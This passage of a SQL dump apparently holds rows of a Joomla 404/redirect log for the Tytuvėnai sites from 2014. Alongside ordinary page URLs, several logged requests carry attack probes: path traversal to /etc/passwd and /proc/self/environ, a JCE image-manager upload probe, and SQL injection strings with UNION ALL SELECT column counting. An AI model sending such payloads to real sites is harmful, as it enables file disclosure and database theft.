00:00:00'),(472,'http://tytuvenai.eu/index.php?option=com_community&view=frontpage','','','',5,0,'2014-07-03 09:07:17','0000-00-00 00:00:00'),(473,'http://www.tytuvenai.eu/index.php?option=com_content&view=article&id=99:ki-vakarien-tytuvn-vienuolyne&catid=1:paskutinesnaujienos&Itemid=53','','','',6,0,'2014-07-03 14:54:58','0000-00-00 00:00:00'),(474,'http://infotytuvenai.lt/index.php/component/content/category/56-tytuvenu-festivalis/naujienos','','','',21,0,'2014-07-04 22:41:04','0000-00-00 00:00:00'),(475,'http://tytuvenai.eu/index.php?option=com_content&view=article&id=71:darbo-umokestis&catid=41:veikla&Itemid=57','','','',3,0,'2014-07-05 08:13:00','0000-00-00 00:00:00'),(476,'http://www.tytuvenai.eu/index.php?option=com_content&view=category&layout=blog&id=1&Itemid=53&limitstart=2','','','',6,0,'2014-07-05 23:06:48','0000-00-00 00:00:00'),(477,'http://infotytuvenai.lt/index.php/lankytini-objektai/gamtos-paminklai','','','',11,0,'2014-07-06 10:46:33','0000-00-00 00:00:00'),(478,'http://tytuvenai.eu/index.php?option=com_content&view=article&id=54&Itemid=57&limitstart=16','','','',3,0,'2014-07-06 15:15:44','0000-00-00 00:00:00'),(479,'http://tytuvenai.eu/index.php/component/content/category/47-piligrimai/piligrimai','','','',22,0,'2014-07-07 05:22:16','0000-00-00 00:00:00'),(480,'http://tytuvenai.eu/index.php?Itemid=53&id=1&layout=blog&limitstart=7&option=com_content&view=category','','','',6,0,'2014-07-08 00:50:00','0000-00-00 00:00:00'),(481,'http://tytuvenai.eu/index.php?option=com_fabrik&c=import&view=import&filetype=csv&tableid=1','','','',3,0,'2014-07-08 09:05:15','0000-00-00 00:00:00'),(482,'http://www.infotytuvenai.lt/index.php/component/content/category/51-vienuolynas/vienuolynas','','','',37,0,'2014-07-09 02:44:33','0000-00-00 00:00:00'),(483,'http://www.infotytuvenai.lt/index.php/component/content/category/8-sample-data-article/joomla','','','',37,0,'2014-07-09 03:49:07','0000-00-00 00:00:00'),(484,'http://www.infotytuvenai.lt/index.php/component/content/category/47-piligrimai/piligrimai','','','',37,0,'2014-07-09 05:11:17','0000-00-00 00:00:00'),(485,'http://www.infotytuvenai.lt/index.php/component/content/category/17-sample-data-article/demo/portfolio/2012','','','',36,0,'2014-07-09 06:27:36','0000-00-00 00:00:00'),(486,'http://www.infotytuvenai.lt/index.php/component/content/category/10-sample-data-article/demo','','','',37,0,'2014-07-09 07:49:46','0000-00-00 00:00:00'),(487,'http://www.infotytuvenai.lt/index.php/component/content/category/11-sample-data-article/demo/short-code','','','',36,0,'2014-07-09 09:13:54','0000-00-00 00:00:00'),(488,'http://www.infotytuvenai.lt/index.php/component/content/category/41-apie-centra/projektai','','','',37,0,'2014-07-09 10:18:29','0000-00-00 00:00:00'),(489,'http://tytuvenai.eu//index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&action=upload&140709-210921','','','',1,0,'2014-07-09 19:09:14','0000-00-00 00:00:00'),(490,'http://tytuvenai.eu/index.php?option=com_community&view=frontpage&140709-210922','','','',1,0,'2014-07-09 19:09:14','0000-00-00 00:00:00'),(491,'http://tytuvenai.eu/index.php?140709-210922','','','',1,0,'2014-07-09 19:09:15','0000-00-00 00:00:00'),(492,'http://www.tytuvenai.eu/index.php?catid=1:paskutinesnaujienos&id=83:pradedame-prekiauti-suvenyrais-su-tytuvn-simbolika&Itemid=53&option=com_content&view=article','','','',1,0,'2014-07-10 14:52:31','0000-00-00 00:00:00'),(493,'http://www.tytuvenai.eu/index.php?view=article&catid=1:paskutinesnaujienos&id=53:nelaime&tmpl=component&print=1&layout=default&page=&option=com_content&Itemid=53','','','',3,0,'2014-07-11 18:31:28','0000-00-00 00:00:00'),(494,'http://tytuvenai.eu/index.php?option=com_content&view=article&id=55:angelo-gele&catid=32:turizmas&Itemid=37','','','',3,0,'2014-07-14 04:39:32','0000-00-00 00:00:00'),(495,'http://tytuvenai.eu/index.php?view=article&catid=1:paskutinesnaujienos&id=90:tytuvn-ansamblio-banyios-stogo-keitimo-darbai-pusjo&tmpl=component&print=1&layout=default&page=','','','',2,0,'2014-07-14 04:39:52','0000-00-00 00:00:00'),(496,'http://tytuvenai.eu/index.php?option=com_content&view=article&id=52:advento-sekmadieniai&catid=1:paskutinesnaujienos&Itemid=53','','','',9,0,'2014-07-14 04:40:04','0000-00-00 00:00:00'),(497,'http://tytuvenai.eu/index.php?option=com_content&view=article&id=91:kvieiame--darb-saugos-seminar&catid=1:paskutinesnaujienos&Itemid=53','','','',4,0,'2014-07-14 04:40:13','0000-00-00 00:00:00'),(498,'http://tytuvenai.eu/index.php?option=com_content&view=article&id=84:projektai&catid=41:veikla&Itemid=79','','','',4,0,'2014-07-14 04:40:23','0000-00-00 00:00:00'),(499,'http://www.tytuvenai.eu/index.php/component/content/article/8-sample-data-article/joomla/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&version=1576&cid=20','','','',2,0,'2014-07-15 03:41:44','0000-00-00 00:00:00'),(500,'http://tytuvenai.eu/index.php/component/content/article/13-sample-data-article/demo/features/','','','',9,0,'2014-07-17 17:21:55','0000-00-00 00:00:00'),(501,'http://tytuvenai.eu/index.php/component/content/category/13-sample-data-article/demo/features','','','',14,0,'2014-07-17 21:42:16','0000-00-00 00:00:00'),(502,'http://tytuvenai.eu/index.php?option=/proc/self/environ&view=article&id=79&Itemid=69','','','',1,0,'2014-07-18 11:15:00','0000-00-00 00:00:00'),(503,'http://tytuvenai.eu/index.php?option=/proc/self/environ\0&view=article&id=79&Itemid=69','','','',1,0,'2014-07-18 11:15:03','0000-00-00 00:00:00'),(504,'http://tytuvenai.eu/index.php?option=../../../../../../../../../../proc/self/environ&view=article&id=79&Itemid=69','','','',1,0,'2014-07-18 11:15:04','0000-00-00 00:00:00'),(505,'http://tytuvenai.eu/index.php?option=/../../../../../../../../../../proc/self/environ&view=article&id=79&Itemid=69','','','',1,0,'2014-07-18 11:15:09','0000-00-00 00:00:00'),(506,'http://tytuvenai.eu/index.php?option=../../../../../../../../../../proc/self/environ\0&view=article&id=79&Itemid=69','','','',1,0,'2014-07-18 11:15:10','0000-00-00 00:00:00'),(507,'http://tytuvenai.eu/index.php?option=/../../../../../../../../../../proc/self/environ\0&view=article&id=79&Itemid=69','','','',1,0,'2014-07-18 11:15:10','0000-00-00 00:00:00'),(508,'http://tytuvenai.eu/index.php?option=/etc/passwd&view=article&id=79&Itemid=69','','','',1,0,'2014-07-18 11:15:10','0000-00-00 00:00:00'),(509,'http://tytuvenai.eu/index.php?option=/etc/passwd\0&view=article&id=79&Itemid=69','','','',1,0,'2014-07-18 11:15:11','0000-00-00 00:00:00'),(510,'http://tytuvenai.eu/index.php?option=../../../../../../../../../../etc/passwd&view=article&id=79&Itemid=69','','','',1,0,'2014-07-18 11:15:11','0000-00-00 00:00:00'),(511,'http://tytuvenai.eu/index.php/component/content/?id=103&Itemid=/proc/self/environ','','','',1,0,'2014-07-18 11:15:11','0000-00-00 00:00:00'),(512,'http://tytuvenai.eu/index.php?option=/../../../../../../../../../../etc/passwd&view=article&id=79&Itemid=69','','','',1,0,'2014-07-18 11:15:12','0000-00-00 00:00:00'),(513,'http://tytuvenai.eu/index.php/component/content/?id=103&Itemid=/proc/self/environ\0','','','',1,0,'2014-07-18 11:15:12','0000-00-00 00:00:00'),(514,'http://tytuvenai.eu/index.php?option=../../../../../../../../../../etc/passwd\0&view=article&id=79&Itemid=69','','','',1,0,'2014-07-18 11:15:12','0000-00-00 00:00:00'),(515,'http://tytuvenai.eu/index.php?option=/../../../../../../../../../../etc/passwd\0&view=article&id=79&Itemid=69','','','',1,0,'2014-07-18 11:15:13','0000-00-00 00:00:00'),(516,'http://tytuvenai.eu/index.php/component/content/?id=103&Itemid=../../../../../../../../../../proc/self/environ','','','',1,0,'2014-07-18 11:15:13','0000-00-00 00:00:00'),(517,'http://tytuvenai.eu/index.php/component/content/?id=103&Itemid=/../../../../../../../../../../proc/self/environ','','','',1,0,'2014-07-18 11:15:14','0000-00-00 00:00:00'),(518,'http://tytuvenai.eu/index.php/component/content/?id=103&Itemid=../../../../../../../../../../proc/self/environ\0','','','',1,0,'2014-07-18 11:15:14','0000-00-00 00:00:00'),(519,'http://tytuvenai.eu/index.php/component/content/?id=103&Itemid=/../../../../../../../../../../proc/self/environ\0','','','',1,0,'2014-07-18 11:15:15','0000-00-00 00:00:00'),(520,'http://tytuvenai.eu/index.php/component/content/?id=103&Itemid=/etc/passwd','','','',1,0,'2014-07-18 11:15:18','0000-00-00 00:00:00'),(521,'http://tytuvenai.eu/index.php/component/content/?id=103&Itemid=/etc/passwd\0','','','',1,0,'2014-07-18 11:15:18','0000-00-00 00:00:00'),(522,'http://tytuvenai.eu/index.php/component/content/?id=103&Itemid=../../../../../../../../../../etc/passwd','','','',1,0,'2014-07-18 11:15:19','0000-00-00 00:00:00'),(523,'http://tytuvenai.eu/index.php/component/content/?id=103&Itemid=/../../../../../../../../../../etc/passwd','','','',1,0,'2014-07-18 11:15:19','0000-00-00 00:00:00'),(524,'http://tytuvenai.eu/index.php/component/content/?id=103&Itemid=../../../../../../../../../../etc/passwd\0','','','',1,0,'2014-07-18 11:15:20','0000-00-00 00:00:00'),(525,'http://tytuvenai.eu/index.php/component/content/?id=103&Itemid=/../../../../../../../../../../etc/passwd\0','','','',1,0,'2014-07-18 11:15:20','0000-00-00 00:00:00'),(526,'http://tytuvenai.eu/index.php?option=com_content&view=article&id=54&Itemid=57&limitstart=8','','','',4,0,'2014-07-18 21:49:52','0000-00-00 00:00:00'),(527,'http://tytuvenai.eu//index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&action=upload&140720-103837','','','',1,0,'2014-07-20 08:38:36','0000-00-00 00:00:00'),(528,'http://tytuvenai.eu/index.php?option=com_community&view=frontpage&140720-103837','','','',1,0,'2014-07-20 08:38:36','0000-00-00 00:00:00'),(529,'http://tytuvenai.eu/index.php?140720-103837','','','',1,0,'2014-07-20 08:38:37','0000-00-00 00:00:00'),(530,'http://www.tytuvenai.eu/index.php?option=com_content&view=article&id=107:tytuvn-ansambliui-400-met&catid=1:paskutinesnaujienos&Itemid=53','','','',2,0,'2014-07-21 06:53:24','0000-00-00 00:00:00'),(531,'http://tytuvenai.eu/index.php?option=com_content&view=article&id=107:tytuvn-ansambliui-400-met&catid=1:paskutinesnaujienos&Itemid=53','','','',2,0,'2014-07-21 06:59:30','0000-00-00 00:00:00'),(532,'http://tytuvenai.eu/index.php/component/content/category/10-sample-data-article/demo','','','',13,0,'2014-07-23 06:00:04','0000-00-00 00:00:00'),(533,'http://tytuvenai.eu/index.php/component/content/category/11-sample-data-article/demo/short-code','','','',13,0,'2014-07-23 06:00:05','0000-00-00 00:00:00'),(534,'http://tytuvenai.eu/index.php/component/content/category/14-sample-data-article/demo/portfolio','','','',13,0,'2014-07-23 06:00:09','0000-00-00 00:00:00'),(535,'http://tytuvenai.eu/index.php/component/content/category/15-sample-data-article/demo/portfolio/2010','','','',13,0,'2014-07-23 06:00:12','0000-00-00 00:00:00'),(536,'http://tytuvenai.eu/index.php/component/content/category/16-sample-data-article/demo/portfolio/2011','','','',13,0,'2014-07-23 06:00:14','0000-00-00 00:00:00'),(537,'http://tytuvenai.eu/index.php/component/content/category/17-sample-data-article/demo/portfolio/2012','','','',13,0,'2014-07-23 06:00:16','0000-00-00 00:00:00'),(538,'http://tytuvenai.eu/index.php/component/content/category/18-sample-data-article/demo/portfolio/2013','','','',13,0,'2014-07-23 06:00:18','0000-00-00 00:00:00'),(539,'http://tytuvenai.eu/index.php/component/content/category/19-sample-data-article/demo/courses','','','',13,0,'2014-07-23 06:00:20','0000-00-00 00:00:00'),(540,'http://tytuvenai.eu/index.php/component/content/category/41-apie-centra/projektai','','','',11,0,'2014-07-23 06:00:33','0000-00-00 00:00:00'),(541,'http://tytuvenai.eu/index.php/component/content/category/43-apie-centra/general','','','',11,0,'2014-07-23 06:00:35','0000-00-00 00:00:00'),(542,'http://tytuvenai.eu/index.php/component/content/category/46-tytuvenai/apie-tytuvenus','','','',11,0,'2014-07-23 06:00:39','0000-00-00 00:00:00'),(543,'http://tytuvenai.eu/index.php/component/content/category/56-tytuvenu-festivalis/naujienos','','','',12,0,'2014-07-23 06:00:50','0000-00-00 00:00:00'),(544,'http://tytuvenai.eu/index.php/component/content/category/8-sample-data-article/joomla','','','',12,0,'2014-07-23 06:00:52','0000-00-00 00:00:00'),(545,'http://www.tytuvenai.eu/index.php/component/content/category/10-sample-data-article/demo','','','',17,0,'2014-07-23 06:01:14','0000-00-00 00:00:00'),(546,'http://www.tytuvenai.eu/index.php/component/content/category/11-sample-data-article/demo/short-code','','','',18,0,'2014-07-23 06:01:16','0000-00-00 00:00:00'),(547,'http://www.tytuvenai.eu/index.php/component/content/category/13-sample-data-article/demo/features','','','',17,0,'2014-07-23 06:01:18','0000-00-00 00:00:00'),(548,'http://www.tytuvenai.eu/index.php/component/content/category/14-sample-data-article/demo/portfolio','','','',17,0,'2014-07-23 06:01:20','0000-00-00 00:00:00'),(549,'http://www.tytuvenai.eu/index.php/component/content/category/15-sample-data-article/demo/portfolio/2010','','','',18,0,'2014-07-23 06:01:22','0000-00-00 00:00:00'),(550,'http://www.tytuvenai.eu/index.php/component/content/category/16-sample-data-article/demo/portfolio/2011','','','',17,0,'2014-07-23 06:01:24','0000-00-00 00:00:00'),(551,'http://www.tytuvenai.eu/index.php/component/content/category/17-sample-data-article/demo/portfolio/2012','','','',18,0,'2014-07-23 06:01:25','0000-00-00 00:00:00'),(552,'http://www.tytuvenai.eu/index.php/component/content/category/18-sample-data-article/demo/portfolio/2013','','','',17,0,'2014-07-23 06:01:27','0000-00-00 00:00:00'),(553,'http://www.tytuvenai.eu/index.php/component/content/category/19-sample-data-article/demo/courses','','','',17,0,'2014-07-23 06:01:29','0000-00-00 00:00:00'),(554,'http://www.tytuvenai.eu/index.php/component/content/category/41-apie-centra/projektai','','','',19,0,'2014-07-23 06:01:45','0000-00-00 00:00:00'),(555,'http://www.tytuvenai.eu/index.php/component/content/category/43-apie-centra/general','','','',18,0,'2014-07-23 06:01:47','0000-00-00 00:00:00'),(556,'http://www.tytuvenai.eu/index.php/component/content/category/46-tytuvenai/apie-tytuvenus','','','',16,0,'2014-07-23 06:01:51','0000-00-00 00:00:00'),(557,'http://www.tytuvenai.eu/index.php/component/content/category/56-tytuvenu-festivalis/naujienos','','','',17,0,'2014-07-23 06:02:02','0000-00-00 00:00:00'),(558,'http://www.tytuvenai.eu/index.php/component/content/category/8-sample-data-article/joomla','','','',20,0,'2014-07-23 06:02:03','0000-00-00 00:00:00'),(559,'http://tytuvenai.eu/index.php?option=com_content&view=article&id=54:dekojame-uz-aukas&catid=1:paskutinesnaujienos&Itemid=65','','','',3,0,'2014-07-23 14:39:56','0000-00-00 00:00:00'),(560,'http://www.infotytuvenai.lt/index.php/component/content/category/13-sample-data-article/demo/features','','','',35,0,'2014-07-24 11:02:52','0000-00-00 00:00:00'),(561,'http://www.infotytuvenai.lt/index.php/component/content/category/14-sample-data-article/demo/portfolio','','','',35,0,'2014-07-24 11:02:56','0000-00-00 00:00:00'),(562,'http://www.infotytuvenai.lt/index.php/component/content/category/15-sample-data-article/demo/portfolio/2010','','','',35,0,'2014-07-24 11:02:59','0000-00-00 00:00:00'),(563,'http://www.infotytuvenai.lt/index.php/component/content/category/16-sample-data-article/demo/portfolio/2011','','','',35,0,'2014-07-24 11:03:01','0000-00-00 00:00:00'),(564,'http://www.infotytuvenai.lt/index.php/component/content/category/18-sample-data-article/demo/portfolio/2013','','','',35,0,'2014-07-24 11:03:08','0000-00-00 00:00:00'),(565,'http://www.infotytuvenai.lt/index.php/component/content/category/19-sample-data-article/demo/courses','','','',35,0,'2014-07-24 11:03:11','0000-00-00 00:00:00'),(566,'http://www.infotytuvenai.lt/index.php/component/content/category/43-apie-centra/general','','','',36,0,'2014-07-24 11:03:44','0000-00-00 00:00:00'),(567,'http://www.infotytuvenai.lt/index.php/component/content/category/46-tytuvenai/apie-tytuvenus','','','',36,0,'2014-07-24 11:03:52','0000-00-00 00:00:00'),(568,'http://www.infotytuvenai.lt/index.php/component/content/category/56-tytuvenu-festivalis/naujienos','','','',37,0,'2014-07-24 11:04:14','0000-00-00 00:00:00'),(569,'http://tytuvenai.eu/index.php/component/content/category/index.php/apie-centra/ekskursijos','','','',10,0,'2014-07-24 15:13:40','0000-00-00 00:00:00'),(570,'http://www.tytuvenai.eu/index.php/component/content/category/index.php/apie-centra/ekskursijos','','','',18,0,'2014-07-24 15:13:44','0000-00-00 00:00:00'),(571,'http://www.tytuvenai.eu/index.php?view=article&catid=1:paskutinesnaujienos&id=54:dekojame-uz-aukas&tmpl=component&print=1&layout=default&page=&option=com_content&Itemid=53','','','',4,0,'2014-07-24 20:56:34','0000-00-00 00:00:00'),(572,'http://www.tytuvenai.eu/index.php?view=article&catid=1:paskutinesnaujienos&id=54:dekojame-uz-aukas&tmpl=component&print=1&layout=default&page=','','','',1,0,'2014-07-24 22:04:00','0000-00-00 00:00:00'),(573,'http://www.tytuvenai.eu/index.php?option=com_content&view=article&id=35:kontaktai&catid=31:general&Itemid=30','','','',2,0,'2014-07-25 05:26:14','0000-00-00 00:00:00'),(574,'http://tytuvenai.eu/index.php?option=com_content&view=article&id=100:tytuvn-banyios-ir-vienuolyno-ansamblis&catid=1:paskutinesnaujienos&Itemid=53','','','',2,0,'2014-07-26 06:38:26','0000-00-00 00:00:00'),(575,'http://tytuvenai.eu/index.php?option=com_content&view=article&id=92:tsiasi-tytuvn-bernardin-vienuolyno-atstatymo-darbai&catid=1:paskutinesnaujienos&Itemid=53','','','',2,0,'2014-07-26 06:40:22','0000-00-00 00:00:00'),(576,'http://tytuvenai.eu/index.php?option=com_content&view=article&id=98:pildome-vaik-svajones&catid=1:paskutinesnaujienos&Itemid=53','','','',2,0,'2014-07-26 07:06:52','0000-00-00 00:00:00'),(577,'http://tytuvenai.eu/index.php?option=com_content&view=article&id=99:ki-vakarien-tytuvn-vienuolyne&catid=1:paskutinesnaujienos&Itemid=53','','','',2,0,'2014-07-26 07:06:59','0000-00-00 00:00:00'),(578,'http://tytuvenai.eu/index.php?Itemid=71&catid=41:veikla&id=71:darbo-umokestis&option=com_content&view=article','','','',5,0,'2014-07-27 02:48:08','0000-00-00 00:00:00'),(579,'http://www.tytuvenai.eu/index.php?option=com_content&view=article&id=15:tytuvn-bendruomens-vaidmens-saugant-ir-naudojant-kultros-paveld-stiprinimas&catid=25:projektai&Itemid=50','','','',2,0,'2014-07-27 06:05:56','0000-00-00 00:00:00'),(580,'http://www.tytuvenai.eu/index.php?view=category&id=4:joomla&option=com_newsfeeds&Itemid=49','','','',2,0,'2014-07-27 06:07:22','0000-00-00 00:00:00'),(581,'http://www.tytuvenai.eu/index.php?view=category&id=6:related-projects&option=com_newsfeeds&Itemid=49','','','',2,0,'2014-07-27 06:07:32','0000-00-00 00:00:00'),(582,'http://tytuvenai.eu/index.php?Itemid=79&id=84&option=com_content&view=article','','','',5,0,'2014-07-27 10:29:48','0000-00-00 00:00:00'),(583,'http://www.infotytuvenai.lt/index.php/component/content/category/index.php/apie-centra/ekskursijos','','','',26,0,'2014-07-27 12:28:15','0000-00-00 00:00:00'),(584,'http://tytuvenai.eu/index.php/component/content/article/11-sample-data-article/demo/short-code/','','','',8,0,'2014-07-28 11:12:52','0000-00-00 00:00:00'),(585,'http://www.infotytuvenai.lt/index.php/lankytini-objektai/fancybox/fancy_shadow_n.png','','','',8,0,'2014-07-29 05:36:53','0000-00-00 00:00:00'),(586,'http://www.infotytuvenai.lt/index.php/lankytini-objektai/fancybox/fancy_shadow_ne.png','','','',8,0,'2014-07-29 05:36:53','0000-00-00 00:00:00'),(587,'http://www.infotytuvenai.lt/index.php/lankytini-objektai/fancybox/fancy_shadow_e.png','','','',8,0,'2014-07-29 05:36:54','0000-00-00 00:00:00'),(588,'http://www.infotytuvenai.lt/index.php/lankytini-objektai/fancybox/fancy_shadow_se.png','','','',8,0,'2014-07-29 05:36:54','0000-00-00 00:00:00'),(589,'http://www.infotytuvenai.lt/index.php/lankytini-objektai/fancybox/fancy_shadow_s.png','','','',8,0,'2014-07-29 05:36:54','0000-00-00 00:00:00'),(590,'http://www.infotytuvenai.lt/index.php/lankytini-objektai/fancybox/fancy_shadow_sw.png','','','',8,0,'2014-07-29 05:36:54','0000-00-00 00:00:00'),(591,'http://www.infotytuvenai.lt/index.php/lankytini-objektai/fancybox/fancy_shadow_w.png','','','',8,0,'2014-07-29 05:36:54','0000-00-00 00:00:00'),(592,'http://www.infotytuvenai.lt/index.php/lankytini-objektai/fancybox/fancy_shadow_nw.png','','','',8,0,'2014-07-29 05:36:54','0000-00-00 00:00:00'),(593,'http://www.tytuvenai.eu/index.php?view=article&catid=32:turizmas&id=55:angelo-gele&tmpl=component&print=1&layout=default&page=&option=com_content&Itemid=37','','','',3,0,'2014-07-29 09:14:48','0000-00-00 00:00:00'),(594,'http://tytuvenai.eu/index.php/component/content/article/10-sample-data-article/demo/','','','',7,0,'2014-07-30 03:10:55','0000-00-00 00:00:00'),(595,'http://www.tytuvenai.eu//index.php?start=6','','','',1,0,'2014-07-30 06:51:51','0000-00-00 00:00:00'),(596,'http://www.tytuvenai.eu//index.php?start=12','','','',1,0,'2014-07-30 06:51:51','0000-00-00 00:00:00'),(597,'http://www.tytuvenai.eu//index.php?start=18','','','',1,0,'2014-07-30 06:51:52','0000-00-00 00:00:00'),(598,'http://www.tytuvenai.eu//index.php?start=24','','','',1,0,'2014-07-30 06:51:53','0000-00-00 00:00:00'),(599,'http://www.tytuvenai.eu//index.php?start=30','','','',1,0,'2014-07-30 06:51:53','0000-00-00 00:00:00'),(600,'http://www.tytuvenai.eu/index.php?view=article&catid=1:paskutinesnaujienos&id=91:kvieiame--darb-saugos-seminar&tmpl=component&print=1&layout=default&page=','','','',2,0,'2014-08-01 04:15:45','0000-00-00 00:00:00'),(601,'http://tytuvenai.eu/index.php/component/content/article/8-sample-data-article/joomla/','','','',7,0,'2014-08-02 09:20:02','0000-00-00 00:00:00'),(602,'http://www.tytuvenai.eu/?view=article&catid=1:paskutinesnaujienos&id=91:kvieiame--darb-saugos-seminar&tmpl=component&print=1&layout=default&page=','','','',1,0,'2014-08-04 02:40:01','0000-00-00 00:00:00'),(603,'http://www.tytuvenai.eu/?option=com_content&view=category&id=32&Itemid=74','','','',1,0,'2014-08-04 02:40:06','0000-00-00 00:00:00'),(604,'http://www.tytuvenai.eu/?option=com_content&view=article&id=84&Itemid=79','','','',1,0,'2014-08-04 02:40:09','0000-00-00 00:00:00'),(605,'http://www.tytuvenai.eu/?option=com_content&view=category&layout=blog&id=1&Itemid=53','','','',1,0,'2014-08-04 02:40:13','0000-00-00 00:00:00'),(606,'http://www.tytuvenai.eu/?option=com_content&view=article&id=90:tytuvn-ansamblio-banyios-stogo-keitimo-darbai-pusjo&catid=1:paskutinesnaujienos&Itemid=53','','','',1,0,'2014-08-04 02:40:17','0000-00-00 00:00:00'),(607,'http://www.tytuvenai.eu/?option=com_content&view=article&id=71&Itemid=71','','','',1,0,'2014-08-04 02:40:22','0000-00-00 00:00:00'),(608,'http://www.tytuvenai.eu/?option=com_content&view=article&id=35&Itemid=30','','','',1,0,'2014-08-04 02:40:24','0000-00-00 00:00:00'),(609,'http://www.tytuvenai.eu/?option=com_content&view=article&id=86&Itemid=80','','','',1,0,'2014-08-04 02:40:34','0000-00-00 00:00:00'),(610,'http://www.tytuvenai.eu/?view=article&catid=1:paskutinesnaujienos&id=92:tsiasi-tytuvn-bernardin-vienuolyno-atstatymo-darbai&tmpl=component&print=1&layout=default&page=','','','',1,0,'2014-08-04 02:40:36','0000-00-00 00:00:00'),(611,'http://www.tytuvenai.eu/?view=article&catid=1:paskutinesnaujienos&id=54:dekojame-uz-aukas&tmpl=component&print=1&layout=default&page=','','','',1,0,'2014-08-04 02:40:56','0000-00-00 00:00:00'),(612,'http://www.tytuvenai.eu/?option=com_content&view=category&layout=blog&id=32&Itemid=37','','','',1,0,'2014-08-04 02:40:57','0000-00-00 00:00:00'),(613,'http://www.tytuvenai.eu/?view=article&catid=1:paskutinesnaujienos&id=53:nelaime&tmpl=component&print=1&layout=default&page=','','','',1,0,'2014-08-04 02:40:58','0000-00-00 00:00:00'),(614,'http://tytuvenai.eu/index.php/component/content/article/16-sample-data-article/demo/portfolio/2011/','','','',7,0,'2014-08-04 07:06:10','0000-00-00 00:00:00'),(615,'http://www.tytuvenai.eu/index.php?option=com_newsfeeds&view=category&id=6:related-projects','','','',1,0,'2014-08-05 14:10:22','0000-00-00 00:00:00'),(616,'http://www.tytuvenai.eu/index.php?view=article&catid=1:paskutinesnaujienos&id=53:nelaime&tmpl=component&print=1&layout=default&page=','','','',1,0,'2014-08-05 16:03:03','0000-00-00 00:00:00'),(617,'http://infotytuvenai.lt/index.php/44-paskutinesnaujienos/122-konkursas-vyr-finansininko-s-pareigybms-eiti','','','',25,0,'2014-08-05 19:28:36','0000-00-00 00:00:00'),(618,'http://www.tytuvenai.eu/index.php/44-paskutinesnaujienos/122-konkursas-vyr-finansininko-s-pareigybms-eiti','','','',32,0,'2014-08-06 08:23:50','0000-00-00 00:00:00'),(619,'http://www.tytuvenai.eu/index.php?option=999999.9','','','',1,0,'2014-08-06 17:28:06','0000-00-00 00:00:00'),(620,'http://www.tytuvenai.eu/index.php?option=com_content and 1=1','','','',1,0,'2014-08-06 17:28:07','0000-00-00 00:00:00'),(621,'http://www.tytuvenai.eu/index.php?option=com_content and 1>1','','','',1,0,'2014-08-06 17:28:08','0000-00-00 00:00:00'),(622,'http://www.tytuvenai.eu/index.php?option=com_content\' and \'x\'=\'x','','','',1,0,'2014-08-06 17:28:09','0000-00-00 00:00:00'),(623,'http://www.tytuvenai.eu/index.php?option=com_content\' and \'x\'=\'y','','','',1,0,'2014-08-06 17:28:10','0000-00-00 00:00:00'),(624,'http://www.tytuvenai.eu/index.php?option=com_content\" and \"x\"=\"x','','','',1,0,'2014-08-06 17:28:11','0000-00-00 00:00:00'),(625,'http://www.tytuvenai.eu/index.php?option=com_content\" and \"x\"=\"y','','','',1,0,'2014-08-06 17:28:11','0000-00-00 00:00:00'),(626,'http://www.tytuvenai.eu/index.php?option=9999 and 1=1','','','',1,0,'2014-08-06 17:28:12','0000-00-00 00:00:00'),(627,'http://www.tytuvenai.eu/index.php?option=999999.9 union all select 0x31303235343830303536--','','','',1,0,'2014-08-06 17:28:14','0000-00-00 00:00:00'),(628,'http://www.tytuvenai.eu/index.php?option=999999.9 union all select 0x31303235343830303536,0x31303235343830303536--','','','',1,0,'2014-08-06 17:28:15','0000-00-00 00:00:00'),(629,'http://www.tytuvenai.eu/index.php?option=999999.9 union all select 0x31303235343830303536,0x31303235343830303536,0x31303235343830303536--','','','',1,0,'2014-08-06 17:28:16','0000-00-00 00:00:00'),(630,'http://www.tytuvenai.eu/index.php?option=999999.9 union all select 0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536--','','','',1,0,'2014-08-06 17:28:17','0000-00-00 00:00:00'),(631,'http://www.tytuvenai.eu/index.php?option=999999.9 union all select 0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536--','','','',1,0,'2014-08-06 17:28:19','0000-00-00 00:00:00'),(632,'http://www.tytuvenai.eu/index.php?option=999999.9 union all select 0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536--','','','',1,0,'2014-08-06 17:28:20','0000-00-00 00:00:00'),(633,'http://www.tytuvenai.eu/index.php?option=999999.9 union all select 0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536--','','','',1,0,'2014-08-06 17:28:21','0000-00-00 00:00:00'),(634,'http://www.tytuvenai.eu/index.php?option=999999.9 union all select 0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536--','','','',1,0,'2014-08-06 17:28:22','0000-00-00 00:00:00'),(635,'http://www.tytuvenai.eu/index.php?option=999999.9 union all select 0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31','','','',1,0,'2014-08-06 17:28:23','0000-00-00 00:00:00'),(659,'http://www.tytuvenai.eu/index.php?option=com_content union all select--','','','',2,0,'2014-08-06 17:28:56','0000-00-00 00:00:00'),(660,'http://www.tytuvenai.eu/index.php?option=com_content union all select null--','','','',2,0,'2014-08-06 17:29:00','0000-00-00 00:00:00'),(661,'http://www.tytuvenai.eu/index.php?option=com_content union all select null,null--','','','',2,0,'2014-08-06 17:29:05','0000-00-00 00:00:00'),(662,'http://www.tytuvenai.eu/index.php?option=com_content union all select null,null,null--','','','',2,0,'2014-08-06 17:29:09','0000-00-00 00:00:00'),(663,'http://www.tytuvenai.eu/index.php?option=com_content union all select null,null,null,null--','','','',2,0,'2014-08-06 17:29:11','0000-00-00 00:00:00'),(664,'http://www.tytuvenai.eu/index.php?option=com_content union all select null,null,null,null,null--','','','',2,0,'2014-08-06 17:29:16','0000-00-00 00:00:00'),(665,'http://www.tytuvenai.eu/index.php?option=com_content union all select null,null,null,null,null,null--','','','',2,0,'2014-08-06 17:29:19','0000-00-00 00:00:00'),(666,'http://www.tytuvenai.eu/index.php?option=com_content union all select null,null,null,null,null,null,null--','','','',2,0,'2014-08-06 17:29:21','0000-00-00 